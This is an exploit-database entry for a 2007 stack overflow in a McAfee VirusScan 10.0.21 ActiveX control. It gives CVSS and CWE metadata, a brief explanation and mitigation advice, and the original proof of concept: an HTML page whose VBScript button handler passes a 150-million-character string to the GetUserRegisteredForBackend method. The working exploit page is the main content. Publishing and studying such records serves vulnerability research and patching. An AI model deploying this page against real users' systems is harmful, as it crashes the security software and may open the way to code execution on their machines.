Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

vendor:

Viruscan

by:

callAX

7.5

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: Viruscan

Affected Version From: 10.0.21

Affected Version To: 10.0.21

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows

2007

Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

The proof of concept demonstrates a stack overflow vulnerability in Mc Afee Viruscan v10.0.21. By clicking on a button, a function called GetUserRegisteredForBackend is triggered, which takes two arguments - bstrBackend and pvarAccountId. The bstrBackend argument is vulnerable to a buffer overflow, as it does not have any length check. An attacker can send a specially crafted string as input, causing the buffer to overflow and potentially execute arbitrary code. This vulnerability can be exploited to gain unauthorized access or crash the application.

Mitigation:

It is recommended to update to a patched version of Mc Afee Viruscan that addresses this vulnerability. Additionally, input validation and length checks should be implemented in the GetUserRegisteredForBackend function to prevent buffer overflow.

Source

Exploit-DB raw data:

<html>

<head><title> Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21</title>

</head>

<h4>Proof of Concept -> Mc Afee Viruscan Stack Overflow v10.0.21

http://download.mcafee.com/fr/ author -> callAX

mail -> callax@shellcode.com.ar

Url -> http://www.shellcode.com.ar / http://www.securenetworks.ch</h3>

 

<object classid='clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602' id='Crash' ></object>

<input type="button" value="CrAsh-m3 No \/\/" language="VBScript" OnClick="CrAsHm3()">

 

<script language="VBScript">

sub CrAsHm3()

 Arg0 = String(150000000,"S")

 Arg1 = String(3000, "x")

 Crash.GetUserRegisteredForBackend Arg0, Arg1

End Sub

 

</script>

</html>

<!--
Bad method -> GetUserRegisteredForBackend

Function GetUserRegisteredForBackend (

            ByVal bstrBackend  As String , <-- Bad Buffer

            ByRef pvarAccountId  As Variant

)
-->

# milw0rm.com [2007-05-09]